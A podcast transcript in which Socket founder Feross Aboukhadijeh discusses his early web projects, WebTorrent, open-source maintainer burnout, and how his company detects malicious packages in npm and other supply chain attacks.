EPISODE 1868

[INTRODUCTION]

[0:00:00] Announcer: Modern software relies heavily on open-source dependencies, often pulling in thousands of packages maintained by developers all over the world. This accelerates innovation, but also creates serious supply chain risks as attackers increasingly compromise popular libraries to spread malware at scale. Feross Aboukhadijeh is the founder and CEO of Socket, which is a security platform designed to protect software projects from open-source supply chain attacks. In this episode, he joins Josh Goldberg to talk about his career in open source, open-source supply chain attacks, practical security lessons, the expanding attack surface in software development, and more. 

This episode is hosted by Josh Goldberg, an independent full-time open source developer. Josh works on projects in the TypeScript ecosystem, most notably TypeScript ESLint, the tooling that enables ESLint and prettier to run on TypeScript code. Josh is also the author of the O'Reilly Learning TypeScript book, a Microsoft MVP for developer technologies, and a live code streamer on Twitch. Find Josh on Bluesky, Mastodon, Twitter, Twitch, YouTube, and.com as Joshua K. Goldberg.

[INTERVIEW]

[0:01:27] JG: Feross Aboukhadijeh, welcome to Software Engineering Daily. 

[0:01:30] FA: Thanks, Josh. Glad to be here. 

[0:01:31] JG: We're excited to have you. You have been in and around open source and general security practices for quite a while. Before we dive into you and Socket, can you tell us how did you get into coding? 

[0:01:41] FA: Yeah, I got into coding when I was in high school. I wanted to build a website to collect my favorite Flash animations. So, I was kind of born in the era of Newgrounds, and eBaum's World, and Albino Blacksheep, and just all these kind of - I don't know if folks remember these or if they're too young. I don't know the audience of this show. But yeah, I always thought those things were fun, and I wanted to kind of collect them all and put them onto one website. I did a lot of downloading of those SWF files from other people's sites and then rehosting them on my own page. And I had to learn PHP to do that and MySQL. And so, that was kind of my first foray. 

[0:02:13] JG: And then you went into Stanford for computer science after that. 

[0:02:17] FA: I mean, yes, I did go to Stanford to study CS. My high school didn't have a CS class, so I kind of was just self-taught with PHP up until that point. But learning CS at Stanford was amazing. A lot of the other majors at Stanford, they don't really necessarily emphasize teaching well, but that's one thing that the computer science department really stands out in. They have just a ton of support. Other undergraduates actually are your TAs and help teach you. And so, I learned a ton. 

I remember my first class I took there, it was using C++. And I remember my first reaction was, "How does the computer know that these words or variables if they don't have dollar signs in front of them?" Because in PHP, every variable has a dollar sign. And so, my mind was blown. I almost spent too much time in PHP in high school, and it took a little bit of unlearning to kind of realize, "Oh, wow. CS and programming is this really broad thing. It's not just PHP and MySQL." 

[0:03:10] JG: Yeah. Do you ever go back and look at the PHP you wrote in high school? 

[0:03:13] FA: I have actually done that before, and it's hilarious. I didn't even know about functions even after years of writing it. I literally just pasted everything multiple times if I needed to do it in more than one place. It's horrible, but it worked. It kind of didn't matter in some sense. I built a site that got - I think at its peak, it had 600,000 annual visitors watching all those Flash videos. I don't know. It's kind of funny how I think the lesson from that is that you should just jump in and do stuff. And I mean, I obviously would never write code like that now. But if you let doing things the right way get in your way, it can kind of take the fun out of it and stop you from just kind of, I don't know, catching the bug. And I caught the bug. 

What really got me excited and kept me going in it was this idea that I can put code online. And while I'm sleeping, it's working for me. It's serving visitors. People are coming to the site having a great time and I'm literally asleep. It's like that scene in Fantasia with the brooms and the buckets. I don't know. It's automation. I don't know. It's just sort of this cool idea of like this thing is just out there. And I think at one point, I put Google AdSense on the site. And so I was like, "Oh, I'm sleeping and it's making me money." It's such a cool idea. Yeah. I don't know that got me really into stuff in high school and college. 

[0:04:30] JG: Believe it or not, it's not the having excellent clean code that gets a lot of newcomers in. It's the results and being able to have that superpower. Yeah. 

[0:04:37] FA: Yeah. That said, I also think it's good to use functions. I wouldn't recommend anyone copy what I did in those early days. 

[0:04:44] JG: Good to know. That was your first popular website. What was your second popular or hit project or website that got released? 

[0:04:52] FA: So, while I was still in high school, I did another site that was around sharing my notes for my AP classes that I was taking with other students. You could go there and access outlines of different chapters in the book. It was kind of like a SparkNotes for AP courses. And that was great because a lot of high schoolers didn't want to read their textbook. And so, that was something that got quite popular. 

That's also when I started learning about SEO, and just all the web search type stuff, and like, "How does Google work? How do you properly semantically build web pages that are going to be indexed by Google that Google's going to love indexing and sending visitors to you?" That was a cool way to learn. 

And then after that, when I went to college, there was one other site that I did that was maybe notable, which was called YouTube Instant. And this was kind of the result of a bet that I did with a college roommate of mine. Google had just announced this thing called Google Instant, which was a way to kind of - it's kind of like autocomplete on steroids. As you type like letters into the search box, instead of just showing you here are five possible searches that you might want to do, it would actually take you to the search results page of the first suggestion before you even hit enter. So, you type A, and then it takes you to this actual search page with the 10 links for Apple or whatever it thinks you were searching for. 

And so, I saw that and I was like, "Oh, that's cool. I bet I could do that for YouTube." And that would be even more cool, because now you're typing letters in and you're getting flashes of different videos coming in. And it's almost like channel surfing, like YouTube. And so I bet my friend I could build it in an hour, which was kind of completely ridiculous. But I just thought like, "Oh, let me just -" I don't know why I did that, but I did. And then he was like, "Yeah, I'll take you up on that." And then I actually did build it in three hours. It was very simple. It was just using the YouTube API and putting a video, embed into the page. No fancy web frameworks, no futzing with getting TypeScript, and React, and all that stuff set up. It was just literally like one JS file and one HTML file. Very, very simple. Pretty horrible code as well. But got that up. 

And then I put a tweet out and a Facebook post out and went to sleep. And then I woke up the next morning, and it was completely viral. It had gone across the internet overnight while I was sleeping. And I don't, to this day, really know why. I think if I had to guess, it was because it was - I mean, it was pretty fun. Once you used it, people wanted to share it. But it was also because it kind of like piggybacked on Google Instant. And they had spent two years engineering Google to support that level of new load just in terms of number of search pages being loaded as literally everyone typing letters. It's like 10x or more of the search volume that they had ever had in the past. 

And so, they hyped up how much engineering effort they put into this. And then, lo and behold, some college sophomore comes along and is like, "I built the same thing for YouTube in three hours." And then that somehow unintentionally became this media story. And then it was fueled even further because the YouTube CEO tweeted to me and said, "Hey, this is great work. Do you want a job at YouTube?" And then that caused a whole other burst of attention. People were talking about how the resume is dead. And building projects and putting them out there is the future of getting hired. And all these thought pieces came out of it. And I was just like kind of swept up in this media storm basically. It was kind of a fun experience to go through as a sophomore and kind of trying to not say something stupid while getting interviewed by NBC or whatever, you know? So, it was pretty cool. 

[0:08:11] JG: That sounds like a very thrilling ride. Are there particular lessons you took away from it that you still use now as a CEO on the other side of the hiring table? 

[0:08:20] FA: Huh. Yeah. I mean, I think the big thing is just launch, just ship things. Don't think too much about it. Build stuff in public. I mean, if I had sat around and, I don't know, tried to use the right framework or tried to - and it's funny, I say this like I'm actually good at this, but the reality is I'm more saying this as advice to myself to remember. Because I also tend to overengineer things and want to do things the right way and sometimes don't ship. And what I think worked in this case was I just put it out there. It didn't really matter that it was pretty bad code. I put it out there and then I improved after I saw that people actually cared. And so that's the right way to do things. 

If you're interested in finding something that works or that resonates with people, it's really about the number of things you put out there, not sitting around in a room by yourself trying to think of the perfect idea. And that's a lesson I've had to learn again over and over in my career, including literally when I started my first company. And we kind of did the opposite of that, where we literally just sat around and built some cool technology for about eight or nine months without really putting it in front of any users. And then, at the end, learning, "Actually, nobody wants this. We just spent nine months building -" it's a cool science project. I learned a lot. I'm glad I worked on it. But nobody wants to buy this or use this. I could have probably learned that really quickly if I just talked to people or had put something more minimal out there. 

[0:09:37] JG: Mm-hmm. You are not the first CEO to mention this on this podcast. Yeah, that's a really important learning. 

[0:09:44] FA: Yeah, there was even a guy on Hacker News when YouTube Instant was on the homepage. It was actually on the home page a couple of times, multiple times at the same time. And then one of the comments, I remember was this guy who - I don't know who he was, but he was really upset that my site was on the homepage. Because he said, he's like, "I've been building the same site for 3 months and it has way more features and it supports filtering and sorting the videos by views and by different things." And he kind of was explaining all the things it could do that mine couldn't. 

But then someone replied to him and was like, "You should have just shipped." And I saw that, and I was like, "Evidence of this lesson literally in that thread." I mean, I obviously felt kind of bad for him. He put in a ton of time. But it sort of proves the point of he should have just shipped. And no one really cares about all the advanced options he was adding. And he should have just put it out there sooner. 

[0:10:33] JG: Yeah, it's a pity. You've shipped quite a few things. We could take this either through your career or through your open source projects in general. Let's talk about the open source projects first because they're quite visible. Is this a continuation of the same mindset of you just shipped a bunch of npm packages? How does that play out? 

[0:10:49] FA: Yeah. I mean, I got into open source originally because after that company I mentioned, it was called Pure CDN, that I worked on for about eight or nine months, basically, we're going to shut it down. And then we got really lucky. And, kind of out of nowhere, Yahoo offered to buy the company. And, really, they wanted us to just join the team and work on JavaScript, and video players, and stuff like that at Yahoo. So, we took the offer because it was - me and my two friends, and we were like, "Well, yeah, this sounds like a good way to wrap this up and make something of this unfortunate situation that no one actually wants what we built. Maybe we can go to Yahoo and they'll use it." 

But they ended up not using the code really at all. They had bigger problems than reducing bandwidth costs of video. And so, we ended up just kind of helping with more fundamental things like making their video player load quickly and work on mobile and stuff like that. But I did feel kind of sad that after all that work, that science project I was talking about, all this cool technology and stuff we had put into it didn't get to see the light of day, and would never get to see the light of day because now they owned it, and it was all proprietary code. 

And so after I left, I worked there for about a year. And I'm proud of what I did there, but it was also one of those things where it's a really big company and it was like hard to ship things. I felt like I was fighting the company to ship things, which is crazy. At one point, my manager said to me, "You need to do less. Just stop trying to do all this stuff. You're making my life hard." 

I remember thinking this is not why we required literally the CEO of Yahoo, Marissa Meyer, at the time told us - and she was on a startup acquisition spree during this time. She told us the reason we're buying you is because we want you to inject startup energy and just this attitude of getting things done, and shipping stuff into the company. And this is why we're bringing you on. But we were just too few. And we were on a much bigger team with the old school folks that were there before. And so we did some good stuff. And there were some really smart people on the team. But ultimately, I think the organization couldn't really handle it, the old blood one rather than the new blood, if that makes sense. 

I left. And then I wanted to play with some of the same ideas of what the original company was doing, which was about building a peer-to-peer CDN. Think a content delivery network, like Cloudflare or Akamai, but powered by end-user devices. Your laptop is in a network, kind of like BitTorrent. And if you're watching a video. You're going to serve that video to other folks that are coming to the same site, and it's sort of like a big peer-to-peer network. And that could speed up sites in some cases, and it could also massively reduce the cost to host sites, which, before Cloudflare was really popular, CDNs were actually quite expensive before they started giving everybody bandwidth for free. And so this is where the idea came from. 

And so after I left Yahoo, I just decided, "Oh, it'd be cool to build that again, but in an open source way. So that no one can ever take it away from me or from the community, I want this to be open. I want anyone to be able to use this. And so that was why I got into open source. I mean, I had always thought of open source maintainers as this sort of crazy, awesome level of programmer that I one day wanted to aspire to be. 

When I was learning to code, I was almost afraid to look at open source packages because it was like all this crazy advanced code that how could you understand what it's doing? I thought it would be cool to do that and give back in that way. And then I had this opportunity to do it with Web Torrent. And so, that's kind of what came out of all this was I ended up building a torrent app that could work in your web browser and do peer-to-peer, from my browser tab to your browser tab, without any software installed on the computer. And so you could really get BitTorrent experience on a website. 

[0:14:16] JG: Which is amusing now, because BitTorrent has BitTorrent Web. 

[0:14:18] FA: Yeah. And, actually, they use Web Torrent under the hood, the protocol that we developed. All the major torrent clients actually support Web Torrent now, finally, after 10 years of trying to get adoption of this standard. It's pretty cool to see finally that it's actually the vision has actually kind of happened where any torrent client running on a desktop can talk to a web browser user across that bridge, which is pretty crazy, I mean, when you think about it, that that's actually possible with WebRTC. 

[0:14:47] JG: As an open source maintainer, how do you feel when one of the projects you lead, or maintain, or have worked on become successful in this way? 

[0:14:54] FA: That's a fun one. At first, it's awesome, right? I mean, you get to talk about it, people are interested in it, you get invited to speak at NodeConf, or JSConf, or whatever. And I remember at that time in my life, I was in my early 20s, and it was super fun getting to go travel the world. I went to so many countries I'd never been to before, met people. And it was funny too because people - they would use me and a few other early node folks as the mad science track of the conference. 

They'd have all these talks on React and kind of practical things, like how do you deploy a microservice? And this, and that, and the other thing. And then they wanted to have certain talks that were like, "You're never going to use this at work, but it's just cool." And that's what they would invite me to be the entertainment, I guess, in that sense. And so I always I think that's why I was invited to those. 

And so it was just fun to be able to show people what I was building. And it was also very in public. Because, honestly, for the first six months of talking about Web Torrent, it didn't work. It was literally in development. And I was talking about it and explaining how WebRTC worked, and how this was all going to work. And doing some cool demos of WebRTC for people during the talks, some live demos and interactive things with people all interacting on a whiteboard from their phones and on my screen, and over peer-to-peer network. And it was really cool, but it wasn't Web Torrent. And so I was definitely doing it in the open, and it was really fun. 

But then when you get to a certain point in your project, what ends up happening - I've seen this happen so many times, not just with me, but with every - basically, almost every maintainer, but not all, but almost every maintainer that I know, is that they eventually just get burned out of doing it. Because, at least for me, what happened was I felt this incredible responsibility to fix every issue that was reported on GitHub. And at first, the volume was really low. It was someone would open an issue and you'd be like, "Oh my god, this is so cool. I have a user using this." And you're so happy. 

And then, eventually, you get to a place where you wake up every morning and there's like 40 issues opened and you're like, "Oh, my God. This is not sustainable." And then they were all issues, too. They weren't even - it was like I kind of forgot why I got into it almost by the end. Because I was like, "Someone's reporting a bug. Oh, it doesn't work on Arch Linux version whatever." And I'm like, "Okay, I don't even care." I should have just said to them you submit a PR if you care about this and I'll review it and merge it. But instead I took it, like, "Oh, it's my job to go and fix it." And so I very much burned myself out by the end and basically needed to walk away and add other folks as maintainers and just kind of go do something else for a while. 

[0:17:16] JG: There's a great blog post that you've, I think, alluded to in the past from Nolan Lawson and what it feels like to be an open source maintainer. Talking about how it's like you have this giant stretch of people in front of you, and there's absolutely no way you can address all of them. And it feels awful on both ends. 

[0:17:31] FA: Yeah, it definitely feels like that. You want to do the right thing and help them. And you feel this obligation. Because it's like your code, and they found a bug, and they're right. There is a bug. And like, "You're correct. And so, therefore, I must fix it." But, actually, there's not a contract saying that you have to do that. It's like I put this code online as a gift to the world. I didn't promise it would never have a defect. And so it's actually okay. It's actually enough to give a one-time gift. You don't have to give a permanent SaaS subscription of your time as a gift to the whole world. I think that was the realization that I finally got to, but after getting super burned out. 

[0:18:06] JG: Let's talk about that dark side of open source because it transitions really well into what you've been doing recently. Specifically, let's talk about security. What is socket.dev, and what's the open-source problem that it's trying to address? 

[0:18:19] FA: Open-source, when it works, is amazing, right? You can just go out and grab any code from the internet that's written by somebody you don't know. You don't know who they are. You probably didn't even read the code. And you can just pull it in and run it on your computer and saves you a ton of time, right? It's this amazing buffet of unlimited, all-you-can-eat code that you can just pull from. 

But there are bad guys, there are criminals that have realized that actually getting access to an open source project and putting malicious code into the package is a great way to attack a bunch of people at once at a really large scale. And so we've seen a lot of attacks of this nature over the last several years for all kinds of motives. Sometimes it's politically motivated. Countries attacking other countries, or trying to attack US companies, or things like that. Other times, it's just basic cryptocurrency criminals that want to just steal people's crypto. 

There's even been cases where people have - they were a good maintainer at one point in time, and then something just snaps in them and they want to watch the world burn. And so they'll put malicious code into their own package that has been trusted for super long. And so it made me start wondering why is there no way to stop this? Why is there no way to catch this? Especially after the fifth or sixth time I saw this happen. I mean, the first time I saw this happen was in 2017 with event stream getting compromised. This was a package where a new maintainer was added who basically said, "Hey, can I help maintain this package? I noticed it hasn't got any updates in a while." And they got access. And then after about 30 days of doing some good changes, they put in a malicious change that stole a bunch of cryptocurrency out of a specific application that was targeted. 

They obfuscated the code and then it only triggered in one specific Electron app. Everyone else who had the code, it just sort of did a no-op. But in this one app, it would trigger and steal all the user's money. This kept happening. And then I looked around, and I was like, "Why is no one doing anything about this? Is this just like the way the world works?" I was also confused. Why is nobody reading the code that they're using? And then I realized I'm really weird, and I read every one of my dependencies before I use it. I mean, maybe not anymore. But when I was working on Web Torrent, certainly it was a small enough surface area that I could actually do that. And then I realized like no one else really does this. It's a pretty rare thing. Like some people do, but it's pretty rare. And so that's why there's really not much of an immune system against this. 

Usually, what happens is the attacker makes a mistake that ends up showing in a log file or something, and then the community just accidentally discovers it. And that's what kept happening. It was always like, "Oh, we accidentally noticed that this package has been stealing everyone's information for the last two weeks." And that's when I was really worried because I'm like, "How many more of these do we not know about if we're just accidentally finding these?" 

In the event stream example, I give you an example of how we found it as a community. It turns out the attacker, they obfuscated their code, and they were using the crypto module in Node.js to decrypt the attack code. But they didn't know that in literally a day or two after they backtored the package that Node decided to deprecate the function that they used. And so, everybody who was using the package started getting this deprecation warning. And then they traced it back to this chunk of code that was added into this library. 

And so that's such a random accident. If that hadn't happened, it might have gone for weeks or months without being discovered. And this pattern just repeats in every one of these attacks. And so that's kind of when I was, "Dang, this is a problem." And no one seems to know how to solve it. 

[0:21:45] JG: What are the techniques that we can use as application developers, separate from, say, Socket, just to kind of harden ourselves against these before we go into specific services? 

[0:21:54] FA: Yeah. Yeah, for sure. I mean, the number one most important thing that everyone should be doing, and everyone is probably already doing, but if not, you should use a lock file. Your package manager probably, depending on the language, but almost all of them support a lock file of some kind. And this is very important because it locks down the specific versions of every package in your dependency tree, so that when a new person on your team clones the code down and runs the install command to install those packages, they're going to get the exact same set of dependencies that you had when you built the application. 

And so there's no randomness, or there's no new versions being brought in unintentionally. It's very explicit. There's also a record of what versions of every package were in use in the git history, so everyone knows what was in use at every point in time in the application. That's the number one thing you can do. That obviously doesn't stop you from installing a bad package, but at least you're not just pulling in whatever happens to be the latest version at the time you run the install command. 

And I want to emphasize, too, it's important that you're using a lock file and not just pinning your direct dependencies to a specific version. If you pin your direct dependencies, that's a good start, but that doesn't lock down the transitives. Because those can also have loose ranges. And then the package manager will go ahead and will install your direct dependency at that exact version. But then in the transitive dependencies, those can be loose ranges that it'll just pull the latest stuff as well. You're still subject to really - you're going to get whatever code happens to be there at the time you run install. I think that's the biggest thing. 

[0:23:25] JG: What's another good tip for us? 

[0:23:27] FA: I mean, really the best tip is to use Socket. But I don't want to - and I'm not just saying that because I started the company. I mean, forgetting about the specific solution of Socket. Really, you want to have some process for vetting dependencies. You want to know what you're depending on. And I think what really helps is having a bit of a mindset shift around how you think about dependencies. 

Today, a lot of people think about them as just this magical code that just comes from the cloud or from the sky somewhere, and then it just sort of solves your problems for you. And they assume, because it's open source, that it must be safe or that someone is vetting it, right? But that is really not the case. 

I mean, everyone is assuming that someone else is vetting this code, right? Everyone has that assumption, "Oh, yeah. It's open source. Someone will vet it." Everyone is making this assumption. And then you actually realize that very few people are actually opening up the code and looking at it. Shockingly few, right? 

This is really obvious when you look at the kinds of attacks that have been pulled off by these attackers and not discovered for, like I said, weeks, sometimes months. They're so obvious, these attacks. If you just open one of the JS files or one of the source code files, you would see - it doesn't look like normal code. It looks super obfuscated. Or there's these giant Base64 strings in there. There's crypto module being imported to decrypt the code. Or there's eval happening. A string is being executed as code. Or there's obvious things like the environment variables are being collected and then sent off in a network request to a suspicious URL. It's like horribly obvious when you look at the file, and then you realize, "Okay, no one is looking at this stuff." This is how it's able to sit in plain sight. 

It's interesting, because Linus Torvalds, the creator of Linux has this law. I think it's called Linus's law that is quite well-known. I think it's the idea that, with many eyeballs, all bugs are shallow. Hope I'm getting the quote right. But something like that. And the idea is that with open source software, eventually, with enough eyeballs looking at the code, all bugs will be discovered at some point and then be fixed. 

And it's true. And he's really highlighting like the value of open source code versus proprietary code. And how when you have open code, people can find these things, they can fix these things. And that is all true. But the question is on what time scale, right? How long is it going to take for the community to find the bug, right? And in the case of a malicious actor putting malware into a library that everybody depends on, the time really matters because some of these things have 10 million downloads a week. And so if something's compromised for even 24 hours before people notice, you're going to have a lot of affected people, a lot of affected applications and companies. 

And so I think that's really the caveat, is how long until detection. And before we started Socket, what we saw was there was a great research paper published in the USENIX Security Conference a few years ago that found that it was around 200-plus days for a malicious package to be discovered by the community and taken down. Really, really bad results. You know what I mean? In terms of hoping for the community to kind of self-correct in this way. 

I think the main thing is just shifting and thinking of open source code not as like someone else's problem, but actually treating it as your problem. It's part of your application. At the end of the day, all this code gets bundled together and run in a single process, or in a single binary, or in a single application. And so it doesn't really matter if you wrote this code and then someone else wrote that other code. Ultimately, you're shipping all that code together to production, and you're responsible for what it does. It has access to all your user data. It has access to all the crown jewels. At the end of the day, it's your code. Even though you got it from GitHub or you got it from PyPI. 

[0:27:05] JG: We'd have this problem where we have an absurdly fastly growing amount of other people's code in our applications. These days, we have so many features as developers, we expect, hot module reloading, and deduplication of packages, and all this, that there's just an inhuman amount of code to look through. Having services look at that code for us seems like a natural next step. 

And you mentioned some kind of somewhat straightforward heuristics, like importing the node crypto module or sending your process environment variables in a network request, stuff that's almost humorously evil. How does Socket take a look at the other people's /rcode and determine what is something to be complained about? 

[0:27:44] FA: Yeah, great question. When we started Socket, we started with our own observations about these types of attacks we were seeing. Things like accessing environment variables, accessing the file system, accessing the network. Especially when that was a new behavior in a package, it hadn't done that for any other version in its entire history. And then, suddenly, now there's a new version that came out yesterday that needs all these capabilities, all these permissions that weren't needed before. And so that's kind of what we started focusing on was detecting just that introduction of new risky capabilities. 

Oh, install scripts is another good one. Not all package managers have this concept. But npm is a famous one that does. And this is a way to automatically run code on the developer system at the time of package installation. And while it has legitimate uses, almost every single piece of malware that we were seeing on npm took advantage of this functionality. The presence of one of these didn't necessarily mean you were dealing with malware. But all malware pretty much had that characteristic. 

You could start to build up these heuristics of what looks like a suspicious change, and then you could sort of alert on them. If you're about to do an npm update or you're about to pull in a new package for the first time, you could see what Socket had identified in that package. 

But then what we found was a lot of teams wanted something even more simple than that. They wanted us to just have like a yes-no, like a Boolean. Is this package malicious or not? And so, right as we started noticing that desire from folks, we got our hands on GPT3.5. We were playing around with this idea of can LLM actually look at code patterns and figure out what the code is doing? 

The main way people were using AI at that time was just sort of to build these little chatbots. You can chat with your database or whatever, right? These types of silly things, in my opinion. We were really asking can they understand the concept of maliciousness. And can they look at the code and tell you whether there's something maybe worth a second look. And so, it didn't really work that well with GPT3.5. But then GPT4 came out, and we got access to the API while it was still in private beta. And then we found, "Holy crap. This actually works really well." 

What we had to do though was - because of cost, right? It's super expensive to use LLMs, especially if you're trying to scan every open source package. Npm alone has like two million packages, not to mention all the other ecosystems. We had to decide when it was worth the cost and the expense to actually do that type of analysis. And so, we used some of those static signals that we had developed before. Does it have network? Does it have file system? Does it eval string? Does it look like it has obfuscated code? Then we would take just those parts and kind of feed it into the LLM. And that's how we built the system that we have today. 

It still has false positives. But if you put a human in front of it to kind of do the final sign off, you can actually get a really high signal from it. And so, that's kind of what we - one of the main things that Socket provides for our customers today is you can get this really high signal feed, whether packages are malicious or not, and then new ones that are being backdoored that no one knows about yet. 

Iou open up our feed right now, you'll literally find something from 30 minutes ago that was just published that's malicious, that's still live on the package manager registry that you could install if you were so unlucky to do so. Yeah. And we report them when we find them, by the way. So, we try to get them taken down to protect everybody. But we often get really, really slow response times from the different registries. Some of them are better than others. 

PyPI is pretty good these days. But a lot of the other ones are very slow. And so, you'll have things where - there's malware from 9 months ago that's still live that they just don't take down. You have to use something like Socket or some other database of this knowledge to kind of protect yourself. 

[0:31:31] JG: Let's say that I'm a company. I'm an enterprise. I have software with dependencies on, let's say, a couple of registries, npm and PyPI. What would I do? How do I use Socket to save myself from these ridiculous malware attacks? 

[0:31:43] FA: Yeah. Easiest way is if you're on GitHub or one of the other major source control systems, GitLab, Bitbucket, you can install Socket from the marketplace. And then we just go right into your GitHub installation, and we can start observing all pull requests and all commits that are happening on all the repos, and we scan every single commit that we see. And so, we can do two things. One is, first of all, you just get visibility. What dependencies am I using across all my repositories? And you can have kind of a snapshot of every point in time as that changes. 

If you ever want to know in the future, like, "Hey, did we ever use this bad package at this bad version number?" You can look it up and see. And then you can also get an inventory of all of your existing risk. Any malicious packages, or vulnerable packages, or other risks that you have within your current set of dependencies, you'll be able to see that. But the most important part is the preventative piece. That's where, in a pull request workflow, whenever a developer is adding a dependency or updating a dependency to a new version, those are the two kind of moments where you're bringing in new third-party code for the first time. And so, Socket will look at all those changes. And if there's any risks it will leave a comment in the PR and just tell all the folks on the team, even the code reviewers as well, as well as the original PR author, about the risk that was identified. 

And this is all configurable. Obviously, malware is frequently what folks want to block. But you can even use it for things like - I don't want to use a package that hasn't had an update in 5 years. That would be a bad idea. Or I don't want to use a package that has obfuscated code in there unless I click the link that Socket provides and go and look at why is it doing this. Does it make any sense? We have folks set it up in different ways, and you can kind of customize it to what you care about for your team. 

[0:33:31] JG: Sure. I imagine, especially in a time where so many companies and open source projects are using tools like Renovate and Dependabot to automatically send PRs for new packages. Something that's blown my mind is, most of the time, by default, these PRs come in as soon as possible. A lot of default configurations don't say wait for 7 days or upon package release. This feels like something that Socket would be very useful for to make sure that you're not installing a malicious package immediately upon its introduction.

[0:33:59] FA: Yeah, that's a great point. One of the things that we've actually seen with a customer is Dependabot opened a PR and then Socket came in and left a comment and said, "Do not upgrade this to this package. It's malicious." It was like a battle of the bots. One bot is like upgrade. And then another bot is like don't upgrade. Yeah. No, totally. It's a really good point. 

And some folks do try to do a delay to sort of protect themselves from these things. That is another piece of advice that I would recommend. If you have an easy way to not take in updates until seven, or 14, or 30 days have gone by, that's a really great way to avoid some of the subset of these attacks. It won't avoid all of them. As I mentioned, some of them stick around for hundreds of days even after Socket has identified them and reported them. It's not foolproof. 

And it also means that you're also not going to get vulnerability fixes if you're waiting 30 days unconditionally. You might want to have a more nuanced policy where you wait 30 days unless there's a critical CVE, in which case you might want to do it sooner. Yeah, there's really a lot of options here. 

[0:35:04] JG: One of the great and terrible points of working in security is that as soon as you fix or largely prevent one style of attack, the attackers will then figure out another somewhat more complex area or style of attacks. What do you think is the next round or the next area that you're going to have to focus on? 

[0:35:21] FA: Yeah, I think that there's a couple ways I could take this. I think I'll maybe mention just the way that we're seeing some of the same types of attacks that have affected open source package ecosystems starting to come to maybe less obvious ecosystems like Chrome extensions, Firefox extensions, VS Code extensions. These are also just JavaScript packages at the end of the day if you think about it. 

And so some of the same types of supply chain attacks that we've seen affect npm are now starting to affect all these other ones. But they also have, in some ways, even their own challenges. If you take Chrome extensions for example, they're similar to npm packages and that they run in a very privileged environment. They run in your browser. And some of them have access to all site content on all pages that you visit. Kind of very similar to a package running on your local machine with all of your user permissions and being able to access all your local files and things like that. 

But in some ways, they're even worse because - there's a certain thing we've seen in Chrome extensions that we've seen a lot less of in open source ecosystems, and that is selling of extensions. Folks will just sell their extension to somebody else. It could have a million installs, and they'll just sell it for like 30k or 40k to some random person who offers them money. And I kind of get where they're coming from. A lot of times folks build these extensions, and they don't have any way to monetize them. And they're just sitting there, and then they can get a meaningful chunk of money like that. They're just like, "Yeah, why not?" And they often don't necessarily know that the person buying it is going to change the behavior in a malicious way. They often tell a story about how they're going to improve it, they're going to keep working on it, and all this other stuff. We've seen that happen a few times in the Chrome ecosystem to really poor results for everybody involved. 

I think that's an area for us that I guess it's sort of expected that attackers are going to go there. They're just always looking for where's the next way that we can get in into environments. And I guess just to kind of cap that off, I should mention that we actually just announced this week, yesterday, so July 29th, for those who are listening to this at a future date, that we now scan Chrome extensions. And we're going to be doing VS Code and the rest. Very exciting new product for us. And, yeah, hopefully we can help keep folks safe even in their browser. 

But, yeah, I think the other thing that's interesting is AI, just the way folks are using it. There's a lot of folks vibe coding these days. And one other area that we've seen attackers go is everyone knows LLMs can hallucinate. And one of the most dangerous ways they can hallucinate is when they're writing code, especially if they're executing that code without user interaction, like in an agent. 

And so everyone is pretty aware, I think, of the idea that you know they can write buggy code, they can write poor quality code, spaghetti code. But far fewer people have realized that you know LLMs can also just write insecure code. Or, specifically, they can install dependencies that are insecure. In some cases, they can hallucinate package names that don't even exist. They're not even real packages. And so what attackers have actually started doing is running the LLMs and generating a bunch of - asking the same question a bunch of times, getting a bunch of lists of what packages the LLM attempts to install. And then they go and they squat on those names. 

If you can basically predict what the LLM is going to hallucinate, you can go register all those names. And just like you would squat on a domain name, you can squat on the hallucinated names. And then you can basically get remote code execution on anyone's machine when the LLM selects those packages. That's one where it's nasty and it's very, very much like a 2025 kind of a problem. 

[0:38:50] JG: It's kind of a beautiful attack when you think about it. It's just so clever. 

[0:38:54] FA: Yeah, I agree. Attackers are always - I mean, that's what they do. Whatever is new, they're already thinking of how to break it. In this AI world, where everyone's just trying to go super fast, and security is an afterthought, as it always is, whenever there's a new paradigm shift, there's going to be stuff like this, and the attackers are going to find it. And that's definitely what's happening with AI. Security is such an afterthought. 

And the other one is MCP servers, right? Everyone is just hooking up. They're taking all these API tokens and putting them into local files on their disk that any malware can just grab, right? Any npm package that's back-doored can just take those things. They're putting all these tokens into these files, and then they're connecting all these disparate data sources, like their Google drives, their emails, all your most sensitive information, so that they can talk to it and have the MCP server give new tools to the agents. But then, first of all, the files are just sitting there with all the tokens. But then on top of that, you fundamentally have a blackbox AI model that nobody really knows what it's going to do, that has privileged tokens accessing all this stuff. It keeps me up at night a little bit. 

[0:39:58] JG: As a member of the defense or the blue team, how do you prevent against these types of attacks? 

[0:40:04] FA: I don't know if there's a really good way for a lot of this AI stuff, because a lot of the adoption is being driven by company boards and company leadership. They don't want to be left behind. They're getting asked all the time, like, "What is your AI strategy? What are you going to do for AI?" And so there's a lot of pressure to just tell everybody to just use all the stuff and not to worry so much about security. 

Even formerly very security-conscious companies, and CTO's, and engineering leaders are kind of lowering their standards a little bit in this rush to adopt this stuff super-fast. I don't have a great answer for you how to generally solve this problem. I think security will get figured out over the next couple of years, like it always does with these things, and it'll be bolted on, and it'll have a bunch of gotchas as it always does when you do it after the fact. I don't know. We'll see. 

[0:40:50] JG: We'll see. I've got one last technical question, just as a curiosity. There are sort of traditional ways to run JavaScript that you've mentioned node and npm. And now there are kind of newer versions of those variants, pnpm and Deno that have more restrictive security models. Do you have thoughts or opinions on those in the security landscape given what we've talked about? 

[0:41:10] FA: Yeah, I think that I love more experimentation. I love to see the stuff that those teams are doing. I think that pnpm, I believe, now restricts install scripts by default. That's awesome to see. Because like I said, yes, they have legitimate uses. But if you have a back door package, if you have a malicious package, the vast majority of them are going to use that feature. 

And the other thing that's nice about it is it's such a rarely used piece of functionality that it's actually not that onerous to just ask the user, "Hey, is it okay if this package runs this install script?" I think it's really great what they did. And then Deno obviously has its permission model, which is really interesting. I'm a fan of that. Node has also actually kind of adopted a similar - it's pretty different, but it sort of does the same thing, way of running packages with really locked down permissions on those executions. It's great to see this kind of stuff. 

